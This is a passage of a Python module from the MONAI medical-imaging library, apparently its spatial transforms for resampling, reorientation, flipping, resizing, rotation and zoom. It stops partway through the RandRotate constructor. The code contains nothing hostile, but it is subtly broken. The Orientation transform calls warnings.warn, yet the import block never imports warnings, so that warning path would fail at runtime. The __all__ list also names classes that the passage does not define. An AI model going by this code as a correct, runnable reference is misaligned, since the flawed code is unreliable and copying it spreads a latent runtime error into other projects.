from copy import deepcopy
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import numpy as np
import torch
from monai.config import USE_COMPILED, DtypeLike
from monai.config.type_definitions import NdarrayOrTensor
from monai.data.utils import AFFINE_TOL, compute_shape_offset, reorient_spatial_axes, to_affine_nd, zoom_affine
from monai.networks.layers import AffineTransform, GaussianFilter, grid_pull
from monai.networks.utils import meshgrid_ij, normalize_transform
from monai.transforms.croppad.array import CenterSpatialCrop, Pad
from monai.transforms.transform import Randomizable, RandomizableTransform, ThreadUnsafe, Transform
from monai.transforms.utils import (
create_control_grid,
create_grid,
create_rotate,
create_scale,
create_shear,
create_translate,
map_spatial_axes,
)
from monai.transforms.utils_pytorch_numpy_unification import allclose, moveaxis
from monai.utils import (
GridSampleMode,
GridSamplePadMode,
InterpolateMode,
NumpyPadMode,
PytorchPadMode,
ensure_tuple,
ensure_tuple_rep,
ensure_tuple_size,
fall_back_tuple,
issequenceiterable,
optional_import,
pytorch_after,
)
from monai.utils.deprecate_utils import deprecated_arg
from monai.utils.enums import TransformBackends
from monai.utils.module import look_up_option
from monai.utils.type_conversion import convert_data_type, convert_to_dst_type
# nibabel is an optional dependency; `has_nib` gates the nibabel-based fast
# reorientation path in `SpatialResample` and the orientation computations below.
nib, has_nib = optional_import("nibabel")
# public API of this module
__all__ = [
    "SpatialResample",
    "ResampleToMatch",
    "Spacing",
    "Orientation",
    "Flip",
    "GridDistortion",
    "Resize",
    "Rotate",
    "Zoom",
    "Rotate90",
    "RandRotate90",
    "RandRotate",
    "RandFlip",
    "RandGridDistortion",
    "RandAxisFlip",
    "RandZoom",
    "AffineGrid",
    "RandAffineGrid",
    "RandDeformGrid",
    "Resample",
    "Affine",
    "RandAffine",
    "Rand2DElastic",
    "Rand3DElastic",
]
# Type alias for the per-dimension random parameter ranges accepted by the random
# affine/elastic transforms: a single number, a sequence of numbers, or a sequence
# of (min, max) pairs; None disables the corresponding parameter.
RandRange = Optional[Union[Sequence[Union[Tuple[float, float], float]], float]]
class SpatialResample(Transform):
    """
    Resample input image from the orientation/spacing defined by ``src_affine`` affine matrix into
    the ones specified by ``dst_affine`` affine matrix.
    """
    backend = [TransformBackends.TORCH]
    def __init__(
        self,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        align_corners: bool = False,
        dtype: DtypeLike = np.float64,
    ):
        """
        Args:
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            align_corners: geometrically, we consider the pixels of the input as squares rather than points.
            dtype: data type for resampling computation.
        """
        self.mode = mode
        self.padding_mode = padding_mode
        self.align_corners = align_corners
        self.dtype = dtype
    def __call__(
        self,
        img: NdarrayOrTensor,
        src_affine: Optional[NdarrayOrTensor] = None,
        dst_affine: Optional[NdarrayOrTensor] = None,
        spatial_size: Optional[Union[Sequence[int], np.ndarray, int]] = None,
        mode: Union[GridSampleMode, str, None] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str, None] = GridSamplePadMode.BORDER,
        align_corners: Optional[bool] = False,
        dtype: DtypeLike = None,
    ) -> Tuple[NdarrayOrTensor, NdarrayOrTensor]:
        """
        Resample `img` from `src_affine` to `dst_affine`.

        Args:
            img: channel-first image array/tensor.
            src_affine: source affine; defaults to a 4x4 identity when None.
            dst_affine: target affine; defaults to `src_affine` when None.
            spatial_size: output spatial size; `-1` means "keep the input size",
                None lets the size/offset be computed from the two affines.
            mode, padding_mode, align_corners, dtype: per-call overrides of the
                instance-level options.

        Returns:
            a (resampled image, actually-applied destination affine) pair.

        Raises:
            ValueError: when `src_affine` is not invertible.
        """
        if src_affine is None:
            src_affine = np.eye(4, dtype=np.float64)
        # number of spatial dims handled: limited by image rank, affine size, and 3
        spatial_rank = min(len(img.shape) - 1, src_affine.shape[0] - 1, 3)
        if (not isinstance(spatial_size, int) or spatial_size != -1) and spatial_size is not None:
            spatial_rank = min(len(ensure_tuple(spatial_size)), 3)
        src_affine = to_affine_nd(spatial_rank, src_affine)
        dst_affine = to_affine_nd(spatial_rank, dst_affine) if dst_affine is not None else src_affine
        dst_affine, *_ = convert_to_dst_type(dst_affine, dst_affine, dtype=torch.float32)
        in_spatial_size = np.asarray(img.shape[1 : spatial_rank + 1])
        if isinstance(spatial_size, int) and (spatial_size == -1):  # using the input spatial size
            spatial_size = in_spatial_size
        elif spatial_size is None and spatial_rank > 1:  # auto spatial size
            spatial_size, _ = compute_shape_offset(in_spatial_size, src_affine, dst_affine)
        spatial_size = np.asarray(fall_back_tuple(ensure_tuple(spatial_size)[:spatial_rank], in_spatial_size))
        # no-op shortcut: same affine and same size (1-D inputs are never resampled)
        if (
            allclose(src_affine, dst_affine, atol=AFFINE_TOL)
            and allclose(spatial_size, in_spatial_size)
            or spatial_rank == 1
        ):
            output_data, *_ = convert_to_dst_type(img, img, dtype=torch.float32)
            return output_data, dst_affine
        # fast path: when the change is a pure axis flip/permutation, use nibabel's
        # orientation machinery instead of a full interpolation
        if has_nib and isinstance(img, np.ndarray):
            spatial_ornt, dst_r = reorient_spatial_axes(img.shape[1 : spatial_rank + 1], src_affine, dst_affine)
            if allclose(dst_r, dst_affine, atol=AFFINE_TOL) and allclose(spatial_size, in_spatial_size):
                # shift orientation entries by one and prepend a no-op row for the channel dim
                spatial_ornt[:, 0] += 1
                spatial_ornt = np.concatenate([np.array([[0, 1]]), spatial_ornt])
                img_ = nib.orientations.apply_orientation(img, spatial_ornt)
                output_data, *_ = convert_to_dst_type(img_, img, dtype=torch.float32)
                return output_data, dst_affine
        # general path: solve src_affine @ xform = dst_affine for the voxel-space transform
        try:
            src_affine, *_ = convert_to_dst_type(src_affine, dst_affine)
            if isinstance(src_affine, np.ndarray):
                xform = np.linalg.solve(src_affine, dst_affine)
            else:
                # torch.solve was removed in favor of torch.linalg.solve (note the
                # swapped argument order between the two APIs)
                xform = (
                    torch.linalg.solve(src_affine, dst_affine)
                    if pytorch_after(1, 8, 0)
                    else torch.solve(dst_affine, src_affine).solution
                )
        except (np.linalg.LinAlgError, RuntimeError) as e:
            raise ValueError(f"src affine is not invertible: {src_affine}") from e
        xform = to_affine_nd(spatial_rank, xform)
        # no-op shortcut: identity voxel transform and unchanged size
        if allclose(xform, np.diag(np.ones(len(xform))), atol=AFFINE_TOL) and allclose(spatial_size, in_spatial_size):
            output_data, *_ = convert_to_dst_type(img, img, dtype=torch.float32)
            return output_data, dst_affine
        _dtype = dtype or self.dtype or img.dtype
        in_spatial_size = in_spatial_size.tolist()
        chns, additional_dims = img.shape[0], img.shape[spatial_rank + 1 :]  # beyond three spatial dims
        # resample
        img_ = convert_data_type(img, torch.Tensor, dtype=_dtype)[0]
        xform = convert_to_dst_type(xform, img_)[0]
        align_corners = self.align_corners if align_corners is None else align_corners
        mode = mode or self.mode
        padding_mode = padding_mode or self.padding_mode
        if additional_dims:
            # fold the extra (non-spatial) trailing dims into the channel dim for resampling
            xform_shape = [-1] + in_spatial_size
            img_ = img_.reshape(xform_shape)
        if align_corners:
            # convert the transform to pixel-center conventions before resampling
            _t_r = torch.diag(torch.ones(len(xform), dtype=xform.dtype, device=xform.device))  # type: ignore
            for idx, d_dst in enumerate(spatial_size[:spatial_rank]):
                _t_r[idx, -1] = (max(d_dst, 2) - 1.0) / 2.0
            xform = xform @ _t_r
            if not USE_COMPILED:
                _t_l = normalize_transform(
                    in_spatial_size, xform.device, xform.dtype, align_corners=True  # type: ignore
                )
                xform = _t_l @ xform  # type: ignore
            affine_xform = Affine(
                affine=xform, spatial_size=spatial_size, norm_coords=False, image_only=True, dtype=_dtype
            )
            output_data = affine_xform(img_, mode=mode, padding_mode=padding_mode)
        else:
            affine_xform = AffineTransform(
                normalized=False,
                mode=mode,
                padding_mode=padding_mode,
                align_corners=align_corners,
                reverse_indexing=True,
            )
            output_data = affine_xform(img_.unsqueeze(0), theta=xform, spatial_size=spatial_size).squeeze(0)
        if additional_dims:
            # restore the original trailing dims
            full_shape = (chns, *spatial_size, *additional_dims)
            output_data = output_data.reshape(full_shape)
        # output dtype float
        output_data, *_ = convert_to_dst_type(output_data, img, dtype=torch.float32)
        return output_data, dst_affine
class ResampleToMatch(SpatialResample):
    """Resample an image to match the affine and spatial shape given in ``dst_meta``."""
    def __call__(  # type: ignore
        self,
        img: NdarrayOrTensor,
        src_meta: Optional[Dict] = None,
        dst_meta: Optional[Dict] = None,
        mode: Union[GridSampleMode, str, None] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str, None] = GridSamplePadMode.BORDER,
        align_corners: Optional[bool] = False,
        dtype: DtypeLike = None,
    ):
        """
        Args:
            img: channel-first image to be resampled.
            src_meta: metadata dictionary of `img`; its ``"affine"`` entry is the source affine.
            dst_meta: metadata dictionary of the reference image; its ``"affine"`` and
                ``"spatial_shape"`` entries define the resampling target.
            mode, padding_mode, align_corners, dtype: per-call overrides of the
                instance-level resampling options.

        Returns:
            a (resampled image, updated copy of `dst_meta`) pair.

        Raises:
            RuntimeError: when `src_meta` or `dst_meta` is not provided.
        """
        # both metadata dictionaries are required to derive the resampling parameters
        if src_meta is None:
            raise RuntimeError("`in_meta` is missing")
        if dst_meta is None:
            raise RuntimeError("`out_meta` is missing")
        # fall back to the instance-level defaults when per-call options are absent
        resolved_mode = mode or self.mode
        resolved_padding = padding_mode or self.padding_mode
        resolved_corners = self.align_corners if align_corners is None else align_corners
        resolved_dtype = dtype or self.dtype
        resampled, applied_affine = super().__call__(
            img=img,
            src_affine=src_meta.get("affine"),
            dst_affine=dst_meta.get("affine"),
            spatial_size=dst_meta.get("spatial_shape"),
            mode=resolved_mode,
            padding_mode=resolved_padding,
            align_corners=resolved_corners,
            dtype=resolved_dtype,
        )
        # hand back a copy of the destination metadata carrying the actually-applied affine
        new_meta = deepcopy(dst_meta)
        new_meta["affine"] = applied_affine
        return resampled, new_meta
class Spacing(Transform):
    """Resample input image into the specified `pixdim` (voxel spacing)."""
    backend = SpatialResample.backend
    def __init__(
        self,
        pixdim: Union[Sequence[float], float, np.ndarray],
        diagonal: bool = False,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        align_corners: bool = False,
        dtype: DtypeLike = np.float64,
        image_only: bool = False,
    ) -> None:
        """
        Args:
            pixdim: output voxel spacing; a single number is broadcast, missing trailing
                components default to 1.0.
            diagonal: whether to resample the input to have a diagonal affine matrix.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
            align_corners: geometric pixel-center convention of the resampler.
            dtype: data type for resampling computation.
            image_only: when True, `__call__` returns only the image (no affines).
        """
        self.pixdim = np.array(ensure_tuple(pixdim), dtype=np.float64)
        self.diagonal = diagonal
        self.image_only = image_only
        # the actual resampling is delegated to SpatialResample
        self.sp_resample = SpatialResample(
            mode=look_up_option(mode, GridSampleMode),
            padding_mode=look_up_option(padding_mode, GridSamplePadMode),
            align_corners=align_corners,
            dtype=dtype,
        )
    def __call__(
        self,
        data_array: NdarrayOrTensor,
        affine: Optional[NdarrayOrTensor] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        align_corners: Optional[bool] = None,
        dtype: DtypeLike = None,
        output_spatial_shape: Optional[Union[Sequence[int], np.ndarray, int]] = None,
    ) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor, NdarrayOrTensor]]:
        """
        Resample `data_array` (channel-first) to the configured voxel spacing.

        Returns the resampled image only when `self.image_only` is True, otherwise a
        (resampled image, original affine, new affine) triple.

        Raises:
            ValueError: when `data_array` has no spatial dimensions.
        """
        sr = int(data_array.ndim - 1)
        if sr <= 0:
            raise ValueError("data_array must have at least one spatial dimension.")
        if affine is None:
            # default to identity
            affine_np = affine = np.eye(sr + 1, dtype=np.float64)
            affine_ = np.eye(sr + 1, dtype=np.float64)
        else:
            affine_np, *_ = convert_data_type(affine, np.ndarray)
            affine_ = to_affine_nd(sr, affine_np)
        # pad the requested spacing with 1.0 for any unspecified trailing dims
        out_d = self.pixdim[:sr]
        if out_d.size < sr:
            out_d = np.append(out_d, [1.0] * (sr - out_d.size))
        # compute output affine, shape and offset
        new_affine = zoom_affine(affine_, out_d, diagonal=self.diagonal)
        output_shape, offset = compute_shape_offset(data_array.shape[1:], affine_, new_affine)
        new_affine[:sr, -1] = offset[:sr]
        output_data, new_affine = self.sp_resample(
            data_array,
            src_affine=affine,
            dst_affine=new_affine,
            spatial_size=list(output_shape) if output_spatial_shape is None else output_spatial_shape,
            mode=mode,
            padding_mode=padding_mode,
            align_corners=align_corners,
            dtype=dtype,
        )
        # restore the original affine rank and container/dtype
        new_affine = to_affine_nd(affine_np, new_affine)
        new_affine, *_ = convert_to_dst_type(src=new_affine, dst=affine, dtype=torch.float32)
        if self.image_only:
            return output_data
        return output_data, affine, new_affine
class Orientation(Transform):
    """Change the input image's orientation into the specified based on `axcodes`."""
    backend = [TransformBackends.NUMPY, TransformBackends.TORCH]
    def __init__(
        self,
        axcodes: Optional[str] = None,
        as_closest_canonical: bool = False,
        labels: Optional[Sequence[Tuple[str, str]]] = tuple(zip("LPI", "RAS")),
        image_only: bool = False,
    ) -> None:
        """
        Args:
            axcodes: N elements sequence for spatial ND input's orientation, e.g. "RAS".
            as_closest_canonical: if True, load the image as closest to canonical axis format.
            labels: optional, None or sequence of (2,) sequences naming the negative/positive
                ends of each axis; defaults to (('L', 'R'), ('P', 'A'), ('I', 'S')).
            image_only: when True, `__call__` returns only the image (no affines).

        Raises:
            ValueError: when neither `axcodes` nor `as_closest_canonical` is set.
        """
        if axcodes is None and not as_closest_canonical:
            raise ValueError("Incompatible values: axcodes=None and as_closest_canonical=True.")
        if axcodes is not None and as_closest_canonical:
            warnings.warn("using as_closest_canonical=True, axcodes ignored.")
        self.axcodes = axcodes
        self.as_closest_canonical = as_closest_canonical
        self.labels = labels
        self.image_only = image_only
    def __call__(
        self, data_array: NdarrayOrTensor, affine: Optional[NdarrayOrTensor] = None
    ) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor, NdarrayOrTensor]]:
        """
        Reorient `data_array` (channel-first) according to `self.axcodes` (or to the
        closest canonical orientation), flipping/permuting axes and updating the affine.

        Returns the image only when `self.image_only` is True, otherwise a
        (image, original affine, new affine) triple.
        """
        spatial_shape = data_array.shape[1:]
        sr = len(spatial_shape)
        if sr <= 0:
            raise ValueError("data_array must have at least one spatial dimension.")
        affine_: np.ndarray
        if affine is None:
            # default to identity
            affine_np = affine = np.eye(sr + 1, dtype=np.float64)
            affine_ = np.eye(sr + 1, dtype=np.float64)
        else:
            affine_np, *_ = convert_data_type(affine, np.ndarray)
            affine_ = to_affine_nd(sr, affine_np)
        # current orientation of the data according to its affine
        src = nib.io_orientation(affine_)
        if self.as_closest_canonical:
            spatial_ornt = src
        else:
            if self.axcodes is None:
                raise ValueError("Incompatible values: axcodes=None and as_closest_canonical=True.")
            if sr < len(self.axcodes):
                warnings.warn(
                    f"axcodes ('{self.axcodes}') length is smaller than the number of input spatial dimensions D={sr}.\n"
                    f"{self.__class__.__name__}: input spatial shape is {spatial_shape}, num. channels is {data_array.shape[0]},"
                    "please make sure the input is in the channel-first format."
                )
            dst = nib.orientations.axcodes2ornt(self.axcodes[:sr], labels=self.labels)
            if len(dst) < sr:
                raise ValueError(
                    f"axcodes must match data_array spatially, got axcodes={len(self.axcodes)}D data_array={sr}D"
                )
            # orientation change needed to go from `src` to `dst`
            spatial_ornt = nib.orientations.ornt_transform(src, dst)
        new_affine = affine_ @ nib.orientations.inv_ornt_aff(spatial_ornt, spatial_shape)
        _is_tensor = isinstance(data_array, torch.Tensor)
        spatial_ornt[:, 0] += 1  # skip channel dim
        spatial_ornt = np.concatenate([np.array([[0, 1]]), spatial_ornt])
        # flip the axes whose direction is reversed by the reorientation
        axes = [ax for ax, flip in enumerate(spatial_ornt[:, 1]) if flip == -1]
        if axes:
            data_array = (
                torch.flip(data_array, dims=axes) if _is_tensor else np.flip(data_array, axis=axes)  # type: ignore
            )
        # then permute the axes into their new order (channel dim stays first)
        full_transpose = np.arange(len(data_array.shape))
        full_transpose[: len(spatial_ornt)] = np.argsort(spatial_ornt[:, 0])
        if not np.all(full_transpose == np.arange(len(data_array.shape))):
            if _is_tensor:
                data_array = data_array.permute(full_transpose.tolist())  # type: ignore
            else:
                data_array = data_array.transpose(full_transpose)  # type: ignore
        out, *_ = convert_to_dst_type(src=data_array, dst=data_array)
        new_affine = to_affine_nd(affine_np, new_affine)
        new_affine, *_ = convert_to_dst_type(src=new_affine, dst=affine, dtype=torch.float32)
        if self.image_only:
            return out
        return out, affine, new_affine
class Flip(Transform):
    """Reverse the order of elements along the given spatial axes.

    Args:
        spatial_axis: spatial axes along which to flip; ``None`` means all
            axes resolved by ``map_spatial_axes`` (the channel axis is handled
            by that helper, not here).
    """

    backend = [TransformBackends.TORCH, TransformBackends.NUMPY]

    def __init__(self, spatial_axis: Optional[Union[Sequence[int], int]] = None) -> None:
        self.spatial_axis = spatial_axis

    def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
        """Flip ``img`` along the configured axes, preserving the input type."""
        axes = map_spatial_axes(img.ndim, self.spatial_axis)
        if isinstance(img, torch.Tensor):
            return torch.flip(img, axes)
        # np.flip returns a view; force a contiguous copy for downstream ops
        return np.ascontiguousarray(np.flip(img, axes))
class Resize(Transform):
    """Resize a channel-first image to the given spatial size using
    ``torch.nn.functional.interpolate``; only spatial dimensions are resized.
    """

    backend = [TransformBackends.TORCH]

    def __init__(
        self,
        spatial_size: Union[Sequence[int], int],
        size_mode: str = "all",
        mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
        align_corners: Optional[bool] = None,
    ) -> None:
        """
        Args:
            spatial_size: target spatial shape. With ``size_mode="all"`` it
                specifies every spatial dim; with ``"longest"`` it must be a
                single int and the longest edge is rescaled to it (aspect
                ratio preserved).
            size_mode: ``"all"`` or ``"longest"``.
            mode: interpolation mode, see ``torch.nn.functional.interpolate``.
            align_corners: forwarded to ``interpolate``.
        """
        self.size_mode = look_up_option(size_mode, ["all", "longest"])
        self.spatial_size = spatial_size
        self.mode: InterpolateMode = look_up_option(mode, InterpolateMode)
        self.align_corners = align_corners

    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[InterpolateMode, str]] = None,
        align_corners: Optional[bool] = None,
    ) -> NdarrayOrTensor:
        """Resize ``img``; ``mode``/``align_corners`` override the constructor values.

        Raises:
            ValueError: when ``spatial_size`` has more dims than the image in
                ``"all"`` mode, or is not an int in ``"longest"`` mode.
        """
        img_, *_ = convert_data_type(img, torch.Tensor, dtype=torch.float)
        if self.size_mode == "all":
            input_ndim = img_.ndim - 1  # spatial ndim
            output_ndim = len(ensure_tuple(self.spatial_size))
            if output_ndim > input_ndim:
                # pad leading singleton spatial dims so shapes are compatible
                input_shape = ensure_tuple_size(img_.shape, output_ndim + 1, 1)
                img_ = img_.reshape(input_shape)
            elif output_ndim < input_ndim:
                raise ValueError(
                    "len(spatial_size) must be greater or equal to img spatial dimensions, "
                    f"got spatial_size={output_ndim} img={input_ndim}."
                )
            spatial_size_ = fall_back_tuple(self.spatial_size, img_.shape[1:])
        else:  # for the "longest" mode
            img_size = img_.shape[1:]
            if not isinstance(self.spatial_size, int):
                raise ValueError("spatial_size must be an int number if size_mode is 'longest'.")
            # uniform scale so the longest spatial edge becomes spatial_size
            scale = self.spatial_size / max(img_size)
            spatial_size_ = tuple(int(round(s * scale)) for s in img_size)
        resized = torch.nn.functional.interpolate(
            input=img_.unsqueeze(0),
            size=spatial_size_,
            mode=look_up_option(self.mode if mode is None else mode, InterpolateMode).value,
            align_corners=self.align_corners if align_corners is None else align_corners,
        )
        out, *_ = convert_to_dst_type(resized.squeeze(0), img)
        return out
class Rotate(Transform, ThreadUnsafe):
    """Rotate a channel-first image by the given angle(s) via affine resampling.

    ``ThreadUnsafe`` because the instance caches the rotation matrix of the most
    recent call (see ``get_rotation_matrix``).
    """

    backend = [TransformBackends.TORCH]

    def __init__(
        self,
        angle: Union[Sequence[float], float],
        keep_size: bool = True,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        align_corners: bool = False,
        dtype: Union[DtypeLike, torch.dtype] = np.float32,
    ) -> None:
        """
        Args:
            angle: rotation angle(s); one value for 2D spatial input, three for 3D.
            keep_size: keep the original spatial shape (may clip corners); otherwise
                the output is enlarged to contain the whole rotated image.
            mode: interpolation mode for resampling.
            padding_mode: how to fill values sampled outside the input.
            align_corners: see ``torch.nn.functional.grid_sample``.
            dtype: dtype used for the resampling computation.
        """
        self.angle = angle
        self.keep_size = keep_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
        self.align_corners = align_corners
        self.dtype = dtype
        # rotation matrix of the most recent __call__ (what makes this thread-unsafe)
        self._rotation_matrix: Optional[NdarrayOrTensor] = None

    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        align_corners: Optional[bool] = None,
        dtype: Union[DtypeLike, torch.dtype] = None,
    ) -> NdarrayOrTensor:
        """Rotate ``img`` (2D or 3D spatial) and return it as the input type.

        Raises:
            ValueError: when the spatial rank of ``img`` is not 2 or 3.
        """
        _dtype = dtype or self.dtype or img.dtype
        img_t, *_ = convert_data_type(img, torch.Tensor, dtype=_dtype)
        im_shape = np.asarray(img_t.shape[1:])  # spatial dimensions
        input_ndim = len(im_shape)
        if input_ndim not in (2, 3):
            raise ValueError(f"Unsupported img dimension: {input_ndim}, available options are [2, 3].")
        _angle = ensure_tuple_rep(self.angle, 1 if input_ndim == 2 else 3)
        transform = create_rotate(input_ndim, _angle)
        # translate so the rotation happens about the image centre, not the origin
        shift = create_translate(input_ndim, ((im_shape - 1) / 2).tolist())
        if self.keep_size:
            output_shape = im_shape
        else:
            # rotate the corner coordinates to find the bounding box of the output
            corners = np.asarray(np.meshgrid(*[(0, dim) for dim in im_shape], indexing="ij")).reshape(
                (len(im_shape), -1)
            )
            corners = transform[:-1, :-1] @ corners  # type: ignore
            output_shape = np.asarray(corners.ptp(axis=1) + 0.5, dtype=int)
        # inverse shift mapping output-centre coordinates back before the rotation
        shift_1 = create_translate(input_ndim, (-(output_shape - 1) / 2).tolist())
        transform = shift @ transform @ shift_1
        transform_t, *_ = convert_to_dst_type(transform, img_t)
        xform = AffineTransform(
            normalized=False,
            mode=look_up_option(mode or self.mode, GridSampleMode),
            padding_mode=look_up_option(padding_mode or self.padding_mode, GridSamplePadMode),
            align_corners=self.align_corners if align_corners is None else align_corners,
            reverse_indexing=True,
        )
        output: torch.Tensor = xform(img_t.unsqueeze(0), transform_t, spatial_size=output_shape).float().squeeze(0)
        self._rotation_matrix = transform
        out: NdarrayOrTensor
        out, *_ = convert_to_dst_type(output, dst=img, dtype=output.dtype)
        return out

    def get_rotation_matrix(self) -> Optional[NdarrayOrTensor]:
        """Return the rotation matrix of the most recent call, or ``None``."""
        return self._rotation_matrix
class Zoom(Transform):
    """Zoom a channel-first image with ``torch.nn.functional.interpolate``,
    optionally padding/cropping afterwards to keep the original spatial shape.
    """

    backend = [TransformBackends.TORCH]

    def __init__(
        self,
        zoom: Union[Sequence[float], float],
        mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
        padding_mode: Union[NumpyPadMode, PytorchPadMode, str] = NumpyPadMode.EDGE,
        align_corners: Optional[bool] = None,
        keep_size: bool = True,
        **kwargs,
    ) -> None:
        """
        Args:
            zoom: zoom factor(s), one per spatial dim or a single shared value.
            mode: interpolation mode, see ``torch.nn.functional.interpolate``.
            padding_mode: padding mode used when ``keep_size`` requires padding.
            align_corners: forwarded to ``interpolate``.
            keep_size: restore the input spatial shape after zooming.
            kwargs: extra arguments forwarded to the internal ``Pad``.
        """
        self.zoom = zoom
        self.mode: InterpolateMode = InterpolateMode(mode)
        self.padding_mode = padding_mode
        self.align_corners = align_corners
        self.keep_size = keep_size
        self.kwargs = kwargs

    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[InterpolateMode, str]] = None,
        padding_mode: Optional[Union[NumpyPadMode, PytorchPadMode, str]] = None,
        align_corners: Optional[bool] = None,
    ) -> NdarrayOrTensor:
        """Zoom ``img``; the keyword arguments override the constructor values."""
        img_t, *_ = convert_data_type(img, torch.Tensor, dtype=torch.float32)
        _zoom = ensure_tuple_rep(self.zoom, img.ndim - 1)  # match the spatial image dim
        zoomed: NdarrayOrTensor = torch.nn.functional.interpolate(  # type: ignore
            recompute_scale_factor=True,
            input=img_t.unsqueeze(0),
            scale_factor=list(_zoom),
            mode=look_up_option(self.mode if mode is None else mode, InterpolateMode).value,
            align_corners=self.align_corners if align_corners is None else align_corners,
        )
        zoomed = zoomed.squeeze(0)
        if self.keep_size and not np.allclose(img_t.shape, zoomed.shape):
            # restore the original shape: pad dims that shrank, crop dims that grew
            pad_vec = [(0, 0)] * len(img_t.shape)
            slice_vec = [slice(None)] * len(img_t.shape)
            for idx, (od, zd) in enumerate(zip(img_t.shape, zoomed.shape)):
                diff = od - zd
                half = abs(diff) // 2
                if diff > 0:  # need padding
                    pad_vec[idx] = (half, diff - half)
                elif diff < 0:  # need slicing
                    slice_vec[idx] = slice(half, half + od)
            padder = Pad(pad_vec, padding_mode or self.padding_mode)
            zoomed = padder(zoomed)
            zoomed = zoomed[tuple(slice_vec)]
        out, *_ = convert_to_dst_type(zoomed, dst=img)
        return out
class Rotate90(Transform):
    """Rotate an array by 90 degrees ``k`` times in the plane of two spatial axes."""

    backend = [TransformBackends.TORCH, TransformBackends.NUMPY]

    def __init__(self, k: int = 1, spatial_axes: Tuple[int, int] = (0, 1)) -> None:
        """
        Args:
            k: number of 90-degree rotations to apply.
            spatial_axes: the two spatial axes that define the rotation plane.

        Raises:
            ValueError: when ``spatial_axes`` does not contain exactly two axes.
        """
        self.k = k
        axes: Tuple[int, int] = ensure_tuple(spatial_axes)  # type: ignore
        if len(axes) != 2:
            raise ValueError("spatial_axes must be 2 int numbers to indicate the axes to rotate 90 degrees.")
        self.spatial_axes = axes

    def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
        """Rotate ``img`` and return it cast back to its original dtype."""
        mapped_axes = map_spatial_axes(img.ndim, self.spatial_axes)
        if isinstance(img, torch.Tensor):
            result: NdarrayOrTensor = torch.rot90(img, self.k, mapped_axes)
        else:
            result = np.rot90(img, self.k, mapped_axes)
        result, *_ = convert_data_type(result, dtype=img.dtype)
        return result
class RandRotate90(RandomizableTransform):
    """With probability ``prob``, rotate the input 90 degrees a random number of times."""

    backend = Rotate90.backend

    def __init__(self, prob: float = 0.1, max_k: int = 3, spatial_axes: Tuple[int, int] = (0, 1)) -> None:
        """
        Args:
            prob: probability of applying the rotation.
            max_k: rotation count is drawn uniformly from ``1..max_k``.
            spatial_axes: the two spatial axes defining the rotation plane.
        """
        RandomizableTransform.__init__(self, prob)
        self.max_k = max_k
        self.spatial_axes = spatial_axes
        self._rand_k = 0

    def randomize(self, data: Optional[Any] = None) -> None:
        """Sample whether to apply the transform and, if so, how many rotations."""
        super().randomize(None)
        if self._do_transform:
            self._rand_k = self.R.randint(self.max_k) + 1

    def __call__(self, img: NdarrayOrTensor, randomize: bool = True) -> NdarrayOrTensor:
        """Apply the sampled rotation, or return ``img`` unchanged."""
        if randomize:
            self.randomize()
        return Rotate90(self._rand_k, self.spatial_axes)(img) if self._do_transform else img
class RandRotate(RandomizableTransform):
    """Randomly rotate the input by angles sampled uniformly from
    ``range_x``/``range_y``/``range_z`` (radians), with probability ``prob``.
    """

    backend = Rotate.backend

    def __init__(
        self,
        range_x: Union[Tuple[float, float], float] = 0.0,
        range_y: Union[Tuple[float, float], float] = 0.0,
        range_z: Union[Tuple[float, float], float] = 0.0,
        prob: float = 0.1,
        keep_size: bool = True,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        align_corners: bool = False,
        dtype: Union[DtypeLike, torch.dtype] = np.float32,
    ) -> None:
        """
        Args:
            range_x, range_y, range_z: angle ranges per axis; a single value ``v``
                is expanded to the symmetric range ``(-v, v)``.
            prob: probability of rotating.
            keep_size, mode, padding_mode, align_corners, dtype: forwarded to ``Rotate``.
        """
        RandomizableTransform.__init__(self, prob)
        self.range_x = ensure_tuple(range_x)
        if len(self.range_x) == 1:
            self.range_x = tuple(sorted([-self.range_x[0], self.range_x[0]]))
        self.range_y = ensure_tuple(range_y)
        if len(self.range_y) == 1:
            self.range_y = tuple(sorted([-self.range_y[0], self.range_y[0]]))
        self.range_z = ensure_tuple(range_z)
        if len(self.range_z) == 1:
            self.range_z = tuple(sorted([-self.range_z[0], self.range_z[0]]))
        self.keep_size = keep_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
